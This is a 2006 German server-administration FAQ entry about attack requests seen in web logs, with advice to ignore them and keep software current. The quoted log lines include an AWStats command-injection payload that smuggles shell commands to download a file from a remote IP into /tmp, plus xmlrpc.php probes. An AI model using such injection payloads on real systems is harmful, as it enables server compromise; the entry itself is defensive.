Security & Firewalls

ID #1109 Hacking-Versuche unterbinden

Problem:

Es wird ständig versucht den Server zu hacken. Z.B. über's Web (es wird aber jeweils ein 404 ausgelöst):

"GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20216%2e55%2e168%2e25%2fkillop%[...]
"GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20216%2e55%2e168%2e25%2fkillop%[...]
"GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20216%2e55%2e168%2e25%2
"POST /xmlrpc.php HTTP/1.1"
"POST /blog/xmlrpc.php HTTP/1.1"
"POST /blog/xmlsrv/xmlrpc.php HTTP/1.1"
"POST /blogs/xmlsrv/xmlrpc.php HTTP/1.1"
"POST /drupal/xmlrpc.php HTTP/1.1"
"POST /phpgroupware/xmlrpc.php HTTP/1.1"
"POST /wordpress/xmlrpc.php HTTP/1.1"
"POST /xmlrpc.php HTTP/1.1"
"POST /xmlrpc/xmlrpc.php HTTP/1.1"
"POST /xmlsrv/xmlrpc.php HTTP/1.1"

Lösung:

Dies läßt sich nicht unterbinden. Das sind Versuche von irgendwelchen Script-Kiddies. Das darf man getrost ignorieren. Falls man allerdings eine dieser Software-Packete wirklich nutzt, sollte man darauf achten, daß man jeweils die aktuelle Version einsetzt. Sonst könnte dies tatsächlich mal zu einem Problem werden.

Erweiterte Lösung:

Zu einem Problem könnte es werden, wenn man die Logfiles statistisch auswertet und die ganzen 404-Fehler nicht drin haben will. Aber in fast allen Logfile-Analyse-Programmen kann man bestimmte Files/Dirs auf "Ignorieren" setzen.

 

sozial Bookmarking
Bookmarken bei YIGG Bookmarken bei Mister-Wong Bookmarken bei Icio Bookmarken bei del.icio.us Bookmarken bei Technorati Bookmarken bei Furl Bookmarken bei Spurl Bookmarken bei Yahoo Bookmarken bei Google

huschi, zuletzt 2006-01-24 10:59     Artikel ausdrucken Artikel weiterempfehlen Als PDF-Datei anzeigen

Dieser Inhalt ist unter der Creative-Commons Lizenz lizensiert.

Probleme bitte im Server-Support-Forum diskutieren.

überflüssig 1 2 3 4 5 wertvoll  
Durchschnittliche Bewertung:   1.5 von 5 (2 Bewertungen)

Artikel kommentieren